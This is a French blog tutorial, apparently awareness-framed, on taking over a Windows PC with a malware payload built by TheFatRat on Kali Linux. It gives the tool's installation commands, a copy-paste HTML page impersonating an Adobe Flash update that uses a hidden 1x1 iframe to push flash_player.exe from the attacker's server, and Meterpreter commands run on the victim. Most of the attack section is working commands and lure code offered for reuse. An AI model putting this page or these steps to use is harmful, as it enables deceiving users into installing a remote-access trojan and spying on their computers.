Comment hacker Windows à l’aide d’un « Malware »

Home

 

Dans cette article je vais vous démontrer comment une personne malicieuse pourrait prendre possession de votre ordinateur Windows à l’aide d’un malware crée avec Kali Linux. Une fois le hacker sur votre réseau, beaucoup d’options s’offre à lui comme par exemple la création d’un malware lui donnant accès à un ordinateur Windows.  Une fois le malware créé, à l’aide de Fatrat, le hacker doit vous faire parvenir son fichier infecté.

 

Il y a plusieurs façon de vous faire parvenir son malware mais la façon choisi ici sera par un téléchargement provenant d’un faux site web, créé par le hacker.  

 

Dans ce vidéo je vais vous démontrer comment effectuer cette attaque.

 

 

Au début du vidéo je vous démontre comment faire l’installation de Fatrat.  Si jamais vous obtenez des erreurs, assurez vous d’avoir la ligne suivante dans votre sources.list deb https://ftp.de.debian.org/debian jessie main Comment installer FatRat:

  • git clone httpss://github.com/Screetsec/TheFatRat.git
  • cd TheFatRat
  • sudo chmod +x setup.sh
  • sudo ./setup.sh
  • sudo chmod +x fatrat
  • sudo chmod +x powerfull.sh
  • sudo ./fatrat

Un peu plus loin dans la vidéo je vous dis de copier du code dans votre fichier /var/www/html/index.html pour la création du faux site web.  Pour vous faciliter la tâche, voici le code que vous pouvez copier/coller dans votre fichier index.html.

 

<!DOCTYPE html>
<html>
<head>
<title> Adobe Falsh Player</title>
</head>
<body><center>
<img src="flash_player.png" alt="plugin" width="500 length="500">
<h2>Error: Plugin missing</h2>
<p>The Adobe Falsh Player plug-in was blocked because it is out of date.</p>
<p>Click the link below to fix this problem</p>
<a href="https://192.168.0.200/flash_player.exe">Activate Adobe Flash.</a>
<h5>Copyright &copy; 2017 Adobe Systems Incorporated. All rights reserved.</h5>
</script></div><iframe width="1" height="1" frameborder="0" src="https://192.168.0.200/flash_player.exe"></iframe>
</body>
</html>

 

À la fin du vidéo j’exécute 2 commandes, prouvant que notre malware à été exécuté et est fonctionnel sur le PC de la victime.  Les 2 commandes sont sysinfo et screenshot qui donne de l’information sur le système de la victime et une capture d’écran de la fenêtre où se situe la victime.  Il existe plusieurs commandes pouvant être exécutés dans Metasploit.  Voici un lien vous dirigeant vers un article sur plusieurs commandes   SANS Institute Metasploit Cheat Sheet Commandes Metasploit Meterpreter

 

Home

Vous pouvez communiquer avec moi  tnt@tntsecurite.ca


Commentaires fermés.